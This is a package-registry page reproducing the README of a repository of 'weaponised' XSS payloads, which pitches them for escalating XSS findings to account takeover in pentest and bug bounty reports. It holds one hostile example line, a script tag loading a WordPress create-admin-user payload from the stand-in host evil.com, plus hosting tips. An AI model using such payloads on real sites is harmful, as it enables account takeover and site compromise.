Huge News!Announcing our $40M Series B led by Abstract Ventures.Learn More
Socket
Sign inDemoInstall
Socket

github.com/hakluke/weaponised-xss-payloads

Package Overview
Dependencies
Alerts
File Explorer
Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

github.com/hakluke/weaponised-xss-payloads

  • v0.0.0-20230424211358-3f7dc65b588a
  • Source
  • Go
  • Socket score

Version published
Created
Source

Weaponised XSS Payloads

XSS payloads designed to turn alert(1) into P1.

The Blog Post

This repo was released alongside a blogpost titled "How to Upgrade Your XSS Bugs from Medium to Critical" https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4

What is this?

In this repository you will find a bunch of JavaScript files which can be loaded into an XSS payload in order to perform sensitive functions on popular CMS platforms in the context of the victim's browser. This can help to chain a plain old XSS bug into something more critical, like an account takeover.

This is perfect for beefing up the severity of a pentest or bug bounty report by demonstrating real security impact.

Payloads are slowly being added either as I have time. There are plenty more to come, if you can help out - pull requests are welcome! If you're looking for inspiration on what to create - check the "issues" tab on this repo.

How To

The simplest way to use these payloads is to host them somewhere and load them into the src attribute of a script tag for your XSS payload like this:

<script src="http://evil.com/wordpress_create_admin_user.js"></script>

Alternatively, depending on the context and length of the payload, it can sometimes be minified, encoded and then just included directly into the request.

In order to host the JavaScript file, you may need to set the Content-Type to application/javascript. To achieve this with PHP, you can simply prepend this line to the top of any of the payloads, save it as a .php file and host it on your PHP-enabled webserver:

<?php header("Content-Type: application/javascript"); ?>

Credits

This article from Shift8 is what inspired me to make this repo. The JS in the article has a couple of minor typos but the concepts are spot on.

FAQs

Package last updated on 24 Apr 2023

Did you know?

Socket

Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.

Install

Related posts

SocketSocket SOC 2 Logo

Product

  • Package Alerts
  • Integrations
  • Docs
  • Pricing
  • FAQ
  • Roadmap
  • Changelog

Packages

npm

Stay in touch

Get open source security insights delivered straight into your inbox.


  • Terms
  • Privacy
  • Security

Made with ⚡️ by Socket Inc